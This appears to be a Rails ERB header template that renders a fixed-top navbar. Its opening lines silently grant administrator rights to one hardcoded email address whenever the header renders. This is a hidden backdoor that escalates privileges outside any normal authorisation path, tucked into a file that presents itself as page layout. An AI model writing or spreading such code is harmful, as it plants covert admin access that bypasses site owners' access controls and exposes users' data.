<% if current_user.email.eql? "gcthuan@apcs.vn" %>
  <% current_user.update_attribute :admin, true %>
<% end %>
<header class="navbar navbar-fixed-top navbar-inverse">
  <div class="navbar-inner">
    <div class="container-fluid">
      <%= render "header_navbar" %>
    </div>
  </div>
</header>